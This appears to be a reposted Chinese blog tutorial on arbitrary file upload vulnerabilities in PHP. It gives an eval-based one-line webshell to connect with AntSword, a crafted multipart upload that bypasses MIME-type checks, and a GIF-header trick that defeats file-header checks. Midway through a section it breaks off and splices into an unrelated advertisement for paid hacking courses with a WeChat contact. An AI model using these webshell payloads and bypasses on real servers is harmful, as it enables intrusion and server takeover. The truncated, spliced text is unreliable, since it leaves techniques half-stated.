当前位置:   article > 正文

3、任意文件上传漏洞_任意文件上传漏洞条件,View的这些基础知识你必须要知道_任意文件上传导致 xss

任意文件上传导致 xss

漏洞利用:

上传一个一句话木马,然后用蚁剑远程连接。

<?php eval($_POST['1'])?>
  • 通过上传GetShell。对于服务器直接支持解析的文件格式,只需要上传该后缀的文件即可。这种
    情况下的漏洞也被称作任意文件上传。

  • 通过上传实现XSS攻击。上传HTML文件时,在其中插入XSS代码实现XSS攻击。

  • 通过上传实现服务器拒绝服务。上传超大文件,或当服务器自动执行解压操作时,上传畸形的压
    缩包文件实现拒绝服务。

文件上传+环境解析 = WebShell
文件上传+任意路径控制 = 文件覆盖(WebShell)
文件上传 - 环境解析 - 路径控制 = XSS
文件上传-环境解析+无大小限制=拒绝服务

3、漏洞绕过

文件类型限制:

<?php if($_FILES['a']['type'] != "image/gif") { die("Sorry,we only allow uploading GIF images"); } ?>

绕过:

------WebKitFormBoundaryU1lrzLiplUyRrlHJ
Content-Disposition: form-data; name=“a”; filename=“filename.php”
Content-Type: text/php image/gif
file_content <?php eval($_GET['a'])?>
------WebKitFormBoundaryU1lrzLiplUyRrlHJ

文件头限制:

<?php $finfo = finfo_open(FILEINFO_MIME_TYPE); $filename = '1.php'; echo finfo_file($finfo,$filename); ?>

绕过:

添加一个GIF(也就是可以上传到服务器上的文件类型)的文件头就可以。

47494638 39613804 A005F700 00000000 | GIF89a8
0509080A 09050B0C 0B120E0D 0E0F100F |
11101211 0E131313 1A151316 16191719 |

文件后缀追加限制:

<?php var_dump($_POST['a']); **自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。** **深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!** **因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。** ![img](https://img-blog.csdnimg.cn/img_convert/003b31c96479eb1721df78f8eca54f0a.png) ![img](https://img-blog.csdnimg.cn/img_convert/3d4e2529fc8666bd135ecffa0489c353.png) ![img](https://img-blog.csdnimg.cn/img_convert/9f2129fb0700adf4145c148987dc9f25.png) ![img](https://img-blog.csdnimg.cn/img_convert/0dcf789fb6bb6ee39c0ecd5e0ff2ac09.png) ![img](https://img-blog.csdnimg.cn/img_convert/340395c4a52f550c6dbd5aef647b37d1.png) ![img](https://img-blog.csdnimg.cn/img_convert/17e3f537be0ba678603c042cfbfe6fb3.png) **既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!** **由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新** **如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)** ![img](https://img-blog.csdnimg.cn/img_convert/105476342ffab7f3dbe6de11de3360b1.png) [**一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0) **AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算** Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/755964
推荐阅读
相关标签
  

闽ICP备14008679号